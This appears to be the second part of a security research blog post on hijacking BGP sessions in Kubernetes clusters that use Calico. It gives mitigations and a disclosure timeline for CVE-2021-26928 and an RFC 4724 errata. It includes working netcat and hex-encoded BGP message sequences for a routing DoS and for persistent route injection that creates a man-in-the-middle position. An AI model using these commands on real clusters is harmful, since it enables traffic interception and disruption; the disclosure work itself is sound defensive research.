In Part 1 of this blog post, we discussed attack vectors that utilize the different features of the devices that network plugins use, such as bridge devices and tunneling devices (VXLAN in particular).
In this second part, we’ll discuss one of the most important aspects of network plugins: the responsibility of setting and updating the routing data.
There are multiple ways of updating the routing data. Some network plugins use Kubernetes annotations to share updates; some rely on the cloud provider’s routing functionality and some use routing daemons (such as BIRD, bgpd, GoBGP, etc.) to distribute routing updates with protocols such as BGP (Border Gateway Protocol) and OSPF (Open Shortest Path First).
From the perspective of the attacker, gaining control over the routing updates is a great achievement. Such an attacker can use it for a stealthy MiTM attack on a broad multi-subnet network, and it’s much harder to detect compared to a LAN based easy-to-detect method such as ARP spoofing.
- This research led to CVE-2021-26928 and a BGP RFC update. We found a way to hijack the BGP session in Calico’s architecture and a logical flaw in BGP RFC4724 that led to a security issue allowing persistent BGP hijacking.
- Routing daemons on Kubernetes clusters are different than the internet infrastructure in their threat model. These are no longer standard networks in which routing components are hardened with degenerate capabilities. This is a complete operating system with third-party products installed, and in fact, all the standard attack vectors are valid to gain a grip on the routing mechanisms.
- Network plugins that leverage BGP routing daemons should implement a secure configuration to minimize their attack surface. TCP-MD5, for example, is a significant mitigation technique for various attack vectors on the BGP protocol.
Abusing Routing Protocols in Kubernetes Environments
In this section, you will see how aforementioned routing daemons can be attacked in order to place any machine, on-premises — or even in the cloud — as a cluster MiTM.
This time, I’ll use Calico as the network plugin for these examples. Calico is a network daemon that runs on every Kubernetes node as a pod. One of the key components in Calico’s pod is the BIRD routing daemon. BIRD is an internet routing daemon and is responsible for picking up the kernel route data and distributing it to BGP peers on the network.
Before we continue with the explanation of the attack vector, let’s say a few words about BGP.
Since there are far too many details to get into, I’ll just focus on the ones that are most relevant to this section.
BGP is a path-vector routing protocol, which means it knows the full path from point A to point B. It’s the standard for internet routing and is required by most internet service providers (ISPs) to establish routing between one another.
A BGP session would look something like this:
Figure.1 – BGP session establishment
As you can see, there must be a full TCP 3-way-handshake before any of the BGP messages.
In Calico’s architecture, BIRD uses a configuration file that is built on information from etcd (using confd) that allows only known cluster peers (worker nodes) to set up a TCP connection with it. Otherwise, it’ll just send a TCP RST packet. Then, after the TCP 3-way-handshake, the BGP session starts with an OPEN Message where each peer shares with the other peer its identifiers and the BGP capabilities it would like to activate.
I would describe BGP capabilities as a collection of features that the peer supports.
For example, one capability would be Multiprotocol Extensions for BGP-4.
If one peer sends the second peer this capability as part of the OPEN message, it states, “I would like to share with you not only IPv4 routing information but also multiple other network-layer protocols (such as IPv6).”
After establishing the connection, the peers will send each other a KeepAlive message.
They will continue to send it to each other within a predefined time period in the OPEN message.
The “heart” of the protocol would be the UPDATE message that carries the routing updates.
That’s the way one peer tells the other, “If you are looking for subnet a.b.c.d/24, you can send it to me. Path X can get you there.”
Figure.2 – BGP UPDATE message
Last, but not least, is the NOTIFICATION message.
NOTIFICATION messages are the way BGP informs your BGP peers about an issue. It includes a major and minor error code (a full list of the error codes can be found here). For example, if one daemon is being deliberately shut-down, it’ll notify its peers about it.
Figure.3 – BGP NOTIFICATION message
Going back to the security aspect, it’s important to be familiar with a well-known BGP attack called BGP hijacking. It occurs when an attacker succeeds in hijacking the session and injects a routing update to the network. When the injected routing information is more specific than current information, it appears like this, for example:
- Current information – a.b.0.0/16
- Injected information – a.b.c.0/24
BGP assumes that the more specific route is more accurate and more reliable, so the more specific route will “win” the routing decision, granting the attacker the ability to control the data flow for this subnet.
Only a true BGP peer can submit a routing update, and BGP peers are able to establish a connection only if they are configured to do so. So, an attacker trying to perform BGP hijacking will rely on one of the following to become a proper peer:
- There was an operator mistake that allows the attacker to impersonate a legitimate peer.
- One of the peers was compromised and is now under the control of an attacker.
Most of the BGP hijacking events that occurred on the internet were of Type 1 — due to an operator misconfiguration. Type 2 is a rarer case. On the internet, BGP daemons are actually routers that aren’t necessarily accessible to various types of attacks.
In Kubernetes clusters, the situation is different.
The BGP routing daemon resides on all of the nodes as part of a full operating system that provides a variety of services and is, therefore, more vulnerable to possible attack vectors.
That makes Type 2 — an attacker-controlled BGP peer — a much more likely scenario. Let’s see how attackers who gained access to your Kubernetes environment can run a BGP hijacking attack in order to place their server in a MiTM position of the cluster.
- A low-privileged user on a node (master/worker) or on a pod with host network namespace. For example:
- An attacker who is running an RCE on your node’s SCOM agent
- An attacker who got access to a pod with HostNetwork configured
Figure.4 – An abstraction of node network architecture when using Calico as Kubernetes network plugin
To run a simple route distribution DoS, it’s enough to steal the TCP session. By “steal” we mean opening a TCP session with the targeted BGP peer. That’s it; there’s no need to send any data. Calico’s BGP daemon — BIRD — as configured, allows you to do that pretty easily. It will give you a full two minutes, whereas the original valid BGP daemon on the peer you’re on won’t be able to reestablish the connection. If two minutes isn’t enough, you can just do the same trick over and over again…
Figure.5 – Simple DoS attack using Netcat
Figure.6 – Explanation of the DoS attack flow
But, of course, if you can already steal the TCP session, why not just hijack the BGP session?
BGP Hijacking and Gaining MiTM Position
In order to hijack the session, the attacker would send a BGP packet sequence of:
- OPEN – opens the BGP session
- Update – update routing data between peers (Kubernetes nodes in that case)
If the UPDATE message includes a forged NEXT_HOP value with a “better route,”— a more specific subnet A.B.C.0/24 instead of A.B.0.0/16, for example — we can manipulate the receiving peer to send packets wherever we want — even outside of the cluster.
Let’s look at this architecture to talk about things in a more practical way.
Figure.7 – BGP hijacking attack scenario
As a PoC, we will place the attacker-controlled server as a MiTM for Google’s DNS IP (126.96.36.199).
We can do that by using these easy-to-use bash commands.
Please note that within the code snippets below there are tagged sections that include explanations. In order for the script to run properly these tags must be deleted before running.
The tags will be in the following structure –
<#> Start of tagging
</#> End of tagging
# Setting up the TCP connection with the Master node tmpd=`mktemp -d` tmpf="$tmpd"/fifo mkfifo "$tmpf" nc 192.168.198.170 179 < "$tmpf" & # OPEN Message # ! NOTE - The tagged parts are the BGP AS (\xfc\x00 => 64512) and the BGP ID (\xc0\xa8\xc6\xab => 192.168.198.171) echo -ne '\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x3f\x01\x04<#>\xfc\x00</#>\x00\xf0<#>\xc0\xa8\xc6\xab</#>\x22\x02\x20\x01\x04\x00\x01\x00\x01\x02\x00\x40\x06\x80\x78\x00\x01\x01\x80\x41\x04\x00\x00\xfc\x00\x45\x04\x00\x01\x01\x03\x46\x00\x47\x00' > $tmpf
Figure.8 – BGP OPEN message
# KeepAlive Message echo -ne '\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x13\x04' > $tmpf
# UPDATE Messages # ! NOTE - The tagged parts are the NEXT_HOP (\xc0\xa8\xc6\xa1 -> 192.168.198.161), the PathID we chose (\x00\x00\x00\x03 -> 3) and the affected subnet (\x20\x08\x08\x08\x08 -> 188.8.131.52/32) echo -ne '\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x46\x02\x00\x00\x00\x15\x40\x01\x01\x00\x40\x02\x00\x40\x03\x04<#>\xc0\xa8\xc6\xa1</#>\x40\x05\x04\x00\x00\x00\x64\x00\x00\x00\x02\x1a\xc0\xa8\x68\x00\x00\x00\x00\x05\x18\xc0\xa8\xc6<#>\x00\x00\x00\x03</#><#>\x20\x08\x08\x08\x08</#>' > $tmpf
echo -ne '\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x17\x02\x00\x00\x00\x00' > $tmpf
There are several parameters we notice when running this attack:
- An OPEN message should include specific parameters:
My AS – Calico’s default is 64512
AS (Autonomous System) – a collection of connected IP routing prefixes under the control of one or more network operators
BGP Identifier – the source IP address
Figure.12 – BGP OPEN message most relevant fields
- An UPDATE message should include:
The “new” NEXT_HOP – the IP of the MiTM machine
The “new and better” destination subnet – in our PoC 184.108.40.206/32
Figure13 – BGP UPDATE message most relevant fields
While running these attack steps and opening Wireshark on the attacker-controlled server (MiTM), we notice that after just a few packets, the connection returns to its original state. That’s because the valid connection “stole” the session back pretty quickly.
Figure.14 – The valid session reestablishing its session
If you’ll look at the BGP session, you’ll see:
Figure.15 – The full flow of this attack scenario
It’s enough as a PoC, but we wanted to achieve a persistent BGP session. This unknowingly led us to uncover an overlooked security issue in one of BGP’s RFCs: RFC4724, Graceful Restart Mechanism for BGP.
BGP Hijacking Persistence
Before we continue, let’s see why we were able to hijack the session in the first place. The possibility for a second TCP session to gain a hold on the session is due to the graceful restart capability that is configured as part of the OPEN message:
Figure.16 – BGP OPEN message “Graceful Restart Capability”
The graceful restart capability dictates, among other things, that in case of receiving a second TCP connection from the same peer, it will act as follows:
Figure.17 – RFC 4724, behavior of BGP connection when using “Graceful Restart Capability”
That’s pretty straight forward. The Graceful Restart Capability changes the BGP FSM (Finite State Machine) so that a new TCP session drops the ESTABLISHED connection.
This is highlighted as a security issue in the same RFC:
Figure.18 – RFC 4724, “Graceful Restart Capability” security considerations
It’s tricky, because on the one hand it becomes our advantage and allows us to hijack the session; on the other hand, it prevents us from achieving persistency over the BGP connection.
Here we come down to the security issue that was overlooked. An attacker can use a NOTIFICATION message with the Unsupported Optional Parameter error code to downgrade the BGP session by causing the receiving peer to strip their capabilities.
Figure.19 – BGP “Unsupported Optional Parameter” NOTIFICATION message
After sending this NOTIFICATION message, the receiving side will try to reestablish the session without any capabilities, including the graceful-restart capability we wanted out of there.
Figure.20 – BGP OPEN message after the “Unsupported Optional Parameter” was sent
That gives an attacker the opportunity to win the network race-condition, establish their own BGP session before the valid one and “lock” the session to themselves.
To do so, we should add this part before running our previous “non-persistent” commands:
tmpd=`mktemp -d` tmpf="$tmpd"/fifo mkfifo "$tmpf" nc 192.168.198.170 179 < "$tmpf" & #Send NOTIFICATION message – Unsupported optional parameter # ! NOTE - The tagged parts are the BGP NOTIFICATION fields - Major Error code (\x02 -> OPEN Message Error) & Minor Error code (\x04 -> Unsupported Optional Parameter) echo -ne '\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x15\x03<#>\x02\x04</#>' > $tmpf kill $ncpid exec 3>& rm -r "$tmpd"
There’s one last change: a side-effect due to the stripping of capabilities. We also removed the “Support for Additional Paths” capability. That’s why we should change the UPDATE message format to not include the “Path ID” field.
# UPDATE Messages # ! NOTE - The tagged parts are the NEXT_HOP (\xc0\xa8\xc6\xa1 -> 192.168.198.161), and this time there's no PathID. Just the affected subnet (\x20\x08\x08\x08\x08 -> 220.127.116.11/32) echo -ne '\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x3a\x02\x00\x00\x00\x15\x40\x01\x01\x00\x40\x02\x00\x40\x03\x04<#>\xc0\xa8\xc6\xa1</#>\x40\x05\x04\x00\x00\x00\x64\x1a\xc0\xa8\x68\x00\x18\xc0\xa8\xc6<#>\x20\x08\x08\x08\x08</#>' > $tmpf
From this point on, we are the “rightful” owners of the session and can inject routings as we wish. Thus, we can redirect traffic between two pods to our MiTM server somewhere in the cloud. It is important to note that if IPIP Tunneling is used, it is necessary to set up an IPIP device on the MiTM server in order to receive the packets.
To create an IPIP device on Linux, run the following commands:
ip link add name ipip0 type ipip local [LOCAL_IPv4_ADDRESS] remote 0.0.0.0 ip link set ipip0 up ip addr add [LOCAL_INTERNAL_IPv4]/[subnet mask] > dev ipip0 ip route add [REMOTE_INTERNAL_IPv4]/[subnet mask] dev ipip0 # For example - # ip link add name ipip0 type ipip local 192.168.148.139 remote 0.0.0.0 # ip link set ipip0 up # ip addr add 172.16.217.128/24 dev ipip0 # ip route add 172.16.28.0/24 dev ipip0
- First and foremost, make sure your pods are configured properly and that your node OS and third-party software are up to date. These steps will make it difficult for an attacker to gain access to your cluster nodes.
In the attack vector we introduced, it’s important to keep in mind two main points regarding the configuration of pods. The first is to make sure that the pod is not configured with HostNetwork mode, unless there is a real need for it. If there is a real need, we advise that the pod is not allowed to access the routing protocol (for example, TCP PORT 179 in BGP) to the nodes of the cluster. The second point (which we discussed in detail in Part1 of this blogpost) is to DROP to the NET_RAW capability of the pod so attackers will not be able to manipulate packets and impersonate outbound traffic from the pod.
- Don’t rely on the default configuration of the network plugin. Make changes to the product configuration. In the case of BGP routing daemon, it is worth implementing a configurable solution such as TCP-MD5 that prevents simple hijacking attacks.
Tigera released a fix for this attack vector in v3.16.3 of the Calico open-source project that allows users to configure a password to authenticate the BGP peers (Calico Enterprise already had this option).
- In Part1 of this blog post, we mentioned the dangers that exist in spoofing IP addresses by attackers from within pods. One of the dangers is that an attacker can spoof the IP address of the host, giving them the opportunity to initiate a TCP 3-way handshake that might cause a BGP DoS, as we described earlier in this blog post. To block this, it is necessary to drop NET_RAW capability from the pod settings (there is a detailed explanation of this in Part 1). Calico also has an out-of-the-box policy that should mitigate this risk.
sum += 1337
The use of routing daemons on Kubernetes clusters is opening some new threat models against known routing protocols’ security limitations. An attacker can exploit these new game rules to manipulate data traffic throughout the cluster from low-privileged access to a single node in the cluster.
We hope that introducing the various features of Kubernetes routing daemons, the attack vector examples and mitigation recommendations will help you understand how an attacker can utilize the routing infrastructure to gain a particularly strong grip on the cluster — and how you can stop it.
We also encourage you to examine the network plugins products in depth to determine if they provide adequate protection. We recommend that you do not settle for out-of-the-box capabilities and make the necessary adjustments and configurations to improve security.
In the first part of this blog series, we dove deep into the network of Kubernetes. Now, at the conclusion of this series, it is important for us to mention that technology is always advancing, as well as the attacker’s techniques and tactics. We are now witnessing a significant increase in the use of eBPF technology to implement network policies in containerized environments. It’s only a matter of time before attackers also find ways to exploit this to their advantage. We, together with you, will try to do it better and faster to identify advanced techniques that help block and prevent such attacks in the future.
Disclosure Timeline – RFC 4724
June 23, 2020 – RFC 4724 security issue reported to IETF (Internet Engineering Task Force)
June 25, 2020 – IETF acknowledged the security issue and suggested to issue an RFC errata
June 29, 2020 – CyberArk Labs issued an errata for RFC4724, “Graceful Restart Mechanism for BGP”
July 21, 2020 – The errata accepted as a “Held for Document Update” status
CyberArk Labs would like to thank the IETF for their great help and patience in the coordination process.
Disclosure Timeline – Tigera
June 15, 2020 – Vulnerability reported to Tigera by CyberArk Labs
June 17, 2020 – In Tigera’s initial response they asked for more clarifications
July 14, 2020 – Tigera reproduced the vulnerability and acknowledged it.
Oct. 14, 2020 – Tigera issued a fix in Calico v3.16.3 which allows the user to add a BGP password to their BGP Peers
Oct. 15, 2020 – CyberArk Labs asked Tigera about issuing a CVE
Oct. 16, 2020 – Tigera responded that they don’t plan to issue a CVE as they deem this is a flaw in the BGP protocol behavior.
Oct.19 – Nov.4, 2020 – Continued communication in which we ended up disagreeing about the nature of the vulnerability
Nov 4, 2020 – CyberArk Labs issued a CVE request to MITRE as a root CNA
Dec. 19, 2020 – MITRE updated they’ll reach out to Tigera
Dec. 28, 2020 – MITRE updated that Tigera deemed the vulnerability lies within the BIRD routing daemon component
Dec. 28, 2020 – CyberArk Labs responded to MITRE pointing out that we believe that the issue is caused by Tigera’s design, not allowing Calico Project users to secure their BGP sessions (noting that the separate BIRD daemon component does allows it)
Feb. 15, 2021 – MITRE issued the Disputed CVE-2021-26928
CyberArk Labs would like to thank the MITRE CVE Assignment Team for their great help and patience in the coordination process.